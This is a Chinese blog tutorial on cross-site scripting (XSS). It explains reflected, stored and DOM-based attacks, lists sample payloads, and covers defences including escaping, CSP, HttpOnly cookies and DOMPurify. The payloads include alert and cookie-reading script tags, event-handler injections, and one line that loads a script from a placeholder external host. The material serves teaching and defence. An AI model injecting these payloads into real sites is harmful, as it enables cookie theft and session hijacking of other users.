xss攻击分析

最新推荐文章于 2024-05-17 09:54:19 发布
最新推荐文章于 2024-05-17 09:54:19 发布
阅读量305 收藏 2
点赞数
文章标签: xss 前端 javascript Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m6140/article/details/129473304
版权

xss的介绍和攻击方式

跨站脚本攻击(XSS)是指攻击者通过巧妙地注入恶意指令代码到网页中,使用户加载并执行攻击者恶意制造的网页程序。攻击者可以通过利用留下的漏洞,向用户注入恶意代码,从而获取用户的敏感信息或者控制用户的浏览器,对用户进行攻击。XSS攻击是最普遍的Web应用安全漏洞,针对的是用户层面的攻击。XSS攻击分为三种类型:

  • 反射型XSS:攻击者通过制造一个恶意链接,诱骗用户点击,使得恶意代码被执行。例如,攻击者构造了一个恶意链接http://www.example.com?name=<script>alert('hack')</script>,用户点击链接后,网站将获取到恶意代码,并执行它,从而弹出一个对话框。

  • 存储型XSS:攻击者将恶意代码存储在服务器端,用户在访问网站时,网站从服务器端获取到恶意代码并执行。例如,攻击者在网站的评论区输入恶意代码<script>alert('hack')</script>,网站将存储这段代码,当其他用户访问这篇评论时,恶意代码将被执行。

  • DOM型XSS:攻击者通过修改DOM节点来实现攻击。例如,攻击者构造一个恶意链接http://www.example.com#<script>alert('hack')</script>,当用户点击链接后,网站会将#后面的内容作为DOM节点进行解析,从而执行恶意代码。

XSS攻击可以用JavaScript代码实现。以下是一些常见的XSS攻击代码:

<script>alert("hack")</script>   #弹出hack
<script>alert(/hack/)</script>   #弹出hack
<script>alert(1)</script>        #弹出1,对于数字可以不用引号
<script>alert(document.cookie)</script>      #弹出cookie
<script src=http://xxx.com/xss.js></script>  #引用外部的xss

除此之外,还有一些其他的XSS攻击代码:

  • 通过onload属性实现攻击:

<svg onload="alert(1)">
<svg onload="alert(1)"//
<video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />
<style οnlοad=alert(1)></style>

  • 通过在标签属性中注入攻击代码实现攻击:

<img  src=1  οnerrοr=alert("hack")>
<img  src=1  οnerrοr=alert(document.cookie)>  #弹出cookie
<body οnlοad=alert(1)>
<body οnpageshοw=alert(1)>

如何防范xss攻击?

在前端防范 XSS 攻击时可以考虑以下措施:

  1. 对用户输入进行过滤和转义,比如将特殊字符(如 <、>、&、'、"等)转义成对应的实体字符,可以使用类库如 dompurifyhe 等。

  1. 设置 HTTP 头部的 Content-Security-Policy (CSP) 字段,限制执行的脚本来源和样式来源,禁止使用 eval() 函数和内联样式。

  1. 使用浏览器提供的 API 进行输入检测和过滤,如 encodeURIComponent()encodeURI()escape()unescape() 等。

  1. 对 cookie 进行安全设置,包括设置 HttpOnly 属性,防止 JavaScript 访问 cookie。

  1. 尽量避免使用 innerHTMLouterHTMLdocument.write() 等 API,可以使用 textContentappendChild() 等更安全的 API。

  1. 对于用户上传的文件,要进行严格的类型、大小、内容等验证,并进行安全的存储和处理。

  1. 在服务端也要对用户输入进行过滤和转义,避免将恶意代码存储到数据库中。综上所述,前端防御 XSS 攻击需要从多个方面入手,综合使用不同的防御措施才能更有效地保护应用程序的安全。

用dompurify库来解决xss

dompurify 是一个用于转义 HTML、SVG 和 MathML 的 JavaScript 库,可以有效地防止 XSS 攻击。它使用白名单过滤器和安全的 DOM 解析器来清除不受信任的代码,同时保留所需的元素、属性和样式。

使用 dompurify 进行过滤和转义主要有以下步骤:

  1. 安装 dompurify 库,可以通过 npm 进行安装:npm install dompurify

  1. 在需要使用的文件中引入 dompurify 库:import DOMPurify from 'dompurify';

  1. 使用 DOMPurify.sanitize() 函数进行过滤和转义。示例代码如下:使用前的字符格式:

// 使用 dompurify 进行过滤和转义:
import DOMPurify from 'dompurify';
const dirty = '<div>这是一段包含恶意脚本的文本:<script>alert("XSS攻击")</script></div>';
const clean = DOMPurify.sanitize(dirty);
console.log(clean);
// 使用后的字符格式
// 可以看到,<、>、" 等特殊字符都被转义成了对应的实体字符,从而避免了恶意代码的执行。
<div>这是一段包含恶意脚本的文本:&lt;script&gt;alert("XSS攻击")&lt;/script&gt;</div>

技术蹭蹭蹭
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS攻击实例1
01-11
在"WebApplication1"这个项目中,你可以通过分析代码和测试不同类型的XSS攻击,理解它们的工作方式,并学习如何有效地实施防护措施。实践是最好的老师,通过实际操作,你可以更深入地掌握这些概念并提升你的Web应用...
DOMPurify 使用方法,如何安全地操作DOM |.sanitize()|.innerHTML|TypeScript TS
cybozu的博客
09-11 1489
你可以用充满脏HTML的字符串来输入DOMPurify,它将返回一个带有干净HTML的字符串(除非另有配置)。您的浏览器越快,DOMPurify 的速度就越快。DOMPurify是用JavaScript编写的,适用于所有现代浏览器(Safari(10+),Opera(15+),Edge,Firefox和Chrome - 以及几乎所有使用Blink,Gecko或WebKit的其他浏览器)。DOMPurify是一个仅限DOM的,超快速的,超级宽容的XSS清理器,用于HTML,MathML和SVG。
XSS攻击
cvvvvvvvvvv的博客
12-09 175
XSS攻击 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSXSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,
“治疗“xss攻击的“特效药“:DOMPurify,让HTML更安全
最新发布
qq_41444226的博客
05-17 719
跨站脚本(XSS)攻击是一种常见的网站安全威胁,它通过将恶意脚本注入到网站中以窃取用户数据或利用用户的身份执行未经授权的操作。DOMPurify 是一个能够帮助前端开发者避免 XSS 攻击的 Javascript 库。DOMPurify是一个用于清洗和消毒HTML、MathML和SVG的小型和快速的库。它的目的是防止跨站脚本攻击(XSS),并确保提供的HTML是安全的,可以在网页中插入使用。
前端如何安全的渲染HTML字符串?
Z__7Gk的博客
08-18 3874
在现代的Web 应用中,动态生成和渲染 HTML 字符串是很常见的需求。然而,不正确地渲染HTML字符串可能会导致安全漏洞,例如跨站脚本攻击(XSS)。为了确保应用的安全性,我们需要采取一些措施来在安全的环境下渲染HTML字符串。本文将介绍一些安全渲染 HTML 字符串的最佳实践,以帮助你有效地避免潜在的安全风险。
CTF学习笔记——跨站脚本攻击
xuanyulevel6的博客
08-29 2307
XSS (Cross Site Scripting),即跨站脚本攻击,是一种常见于 Web 应用中的计算机安全漏洞。恶意攻击者往 Web 页面里嵌入恶意的客户端脚本,当用户浏览此网页时,脚本就会在用户的浏览器上执行,进而达到攻击者的目的。比如获取用户的 Cookie、导航到恶意网站、携带木马等。借助安全圈里面非常有名的一句话:*所有的输入都是有害的。*这句话把 XSS 漏洞的本质体现的淋漓尽致。大部分的 XSS 漏洞都是由于没有处理好用户的输入,导致恶意脚本在浏览器中执行。...
XSS跨站脚本攻击漏洞(1)
weixin_51339377的博客
04-05 3208
XSS漏洞介绍: xss攻击的目录就是让前端把我们的攻击代码执行 跨站攻击 全都是前端的 只需要右击查看源代码就可以查看到漏洞了 测试漏洞方式:弹窗测试(测试成功以后具体功能实现的xss代码有很多免费的xss平台 可以直接使用) 弹窗基本代码: <script>alert(1)</script> 在输入框输入代码提交以后如果出现弹窗说明存在xss漏洞。此时提交成功可以右键在网页源代码里面看到自己提交上去的js代码 因为本身存储框,留言板这种就会在...
Yii2的XSS攻击防范策略分析
10-21
主要介绍了Yii2的XSS攻击防范策略,较为详细的分析XSS攻击的原理及Yii2相应的防范策略,需要的朋友可以参考下
防止XSS攻击教程
06-03
防止XSS攻击的关键在于对用户输入进行严格的验证和过滤,以及正确地编码和转义输出。以下是一些重要的知识点: 1. **了解XSS类型**: - 存储型XSS:恶意脚本被存储在服务器上,如评论区、论坛帖子等,当其他用户...
跨站式脚本(Cross-SiteScripting)XSS攻击原理分析第1/4页
10-30
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
Java防止xss攻击jar包
03-29
XSS攻击通常通过注入恶意代码到网页中,当用户浏览这些页面时,代码被执行,可能导致数据泄露、会话劫持等严重后果。为了解决这个问题,开发者可以使用特定的库和工具来防止XSS攻击,如在给定的压缩包中包含的"antlr...
WEB攻击与安全策略
随心所欲的便笺
05-26 513
web安全 xss攻击 也叫跨站脚本攻击 本质 恶意代码未经过滤,与网站正常的代码混在一起,浏览器无法分辨哪些脚本是可信的,导致恶意脚本被执行。 由于直接在用户的终端执行,恶意代码能够直接获取用户的信息,利用这些信息冒充用户向网站发起攻击者定义的请求。 利用了用户对特定 Web 应用程序的信任 分类 1. 反射型XSS 描述: 反射型 XSS 漏洞常见于通过 URL 传递参数的功能,如网站搜索、跳转等。由于需要用户主动打开恶意的 URL 才能生效,攻击者往往会结合多种手段诱导用户点击。 防范: 使用enco
网络安全学习笔记之xss攻击
m0_74066805的博客
03-20 873
学习内容来自哔哩哔哩的up主——网络安全就业推荐。
XSS跨站脚本(web应用)——XSS跨站脚本(二)
Gjqhs的博客
02-24 966
本章目的 普及XSS漏洞原理和分类,以及XSSspayload构造以及变形 基础概念 XSS漏洞概述 XSS被称为跨站脚本攻击(Cross-site scripting),由于和CSS(Cascading Style Sheets)重名,所以改为XSSXSS主要基于javascript语言完成恶意的攻击行为,因为javascript可以非常灵活的操作html、css和浏览器。 XSS简介 XSS就是指通过利用网页开发时留下的漏洞(由于Web应用程序对用户的输入过滤不足),巧妙的将恶意代码注入到网
xss--跨站脚本攻击
klcyl_0106的博客
05-14 2298
一、定义 攻击者在网页中嵌入恶意脚本代码(javascript),当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者目的。 二、原理 本质:可控变量,显示输出变量。代码在对数据进行显示出现的安全问题。——js代码 产生层面:前端。 函数类:输出型函数。 危害影响:受js代码影响。 浏览器内核版本:受对方浏览器版本限制,可能带有过滤。 三、危害 (1)窃取管理员帐号或cookie。入侵者可以冒充管理员的身份登录后台。使得入侵者具有恶意操纵后台数据的能力,包括读取、更改、添加、删除一些信息
前端安全(一)XSS攻击原理及防范
qq_34416331的博客
12-18 2410
前端是直面用户的窗口,其安全性却是最容易被忽略的一环。本文将介绍: 一、什么是XSS攻击 1.1 定义 1.2 XSS攻击的危害 二、 XSS攻击类型 2.1 反射型攻击 2.2 存储型攻击 2.3 DOM型攻击 2.4 三种攻击类型的区别 三、 如何防范XSS攻击 3.1 设置Cookie HttpOnly 为 true 3.2 纯前端渲染 3.3 使用合适的转义库...
XSS攻击原理和解决方法
芦金宇的专栏
09-23 1208
概述 XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器 执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实 施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨 大的,是web安全的号大敌。 ...
网络安全——XSS跨站脚本攻击
weixin_54055099的博客
09-16 4238
XSS跨站脚本攻击,DVWA靶机的三种类型三个等级的操作
DOMPurify:一个只针对 DOM 的、超快的、宽容的 HTML XSS清理工具
前端全栈开发者
01-21 1800
是一个只针对 DOM 的、超快的、超容忍的 HTML、MathML 和 SVG 跨站脚本清理器。DOMPurify 于 2014 年 2 月发布,目前已经达到 v3.0.8 版本。DOMPurify 是用 JavaScript 编写的,在所有现代浏览器(Safari(10 ),Opera(15 ),Edge,Firefox 和 Chrome - 以及几乎所有使用 Blink,Gecko 或 WebKit 的浏览器)上都可以运行,它不会在 MSIE 或其他旧版浏览器上崩溃。
XSS攻击详解:跨站脚本危害与类型分析
3. XSS攻击案例分析 - 存储型XSS:黑客在存在漏洞的留言板上发布含有恶意脚本的评论。当用户查看该页面时,脚本执行,用户的Cookie被发送到黑客控制的服务器,从而允许黑客冒充用户进行操作。 - 反射型XSS:黑客...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值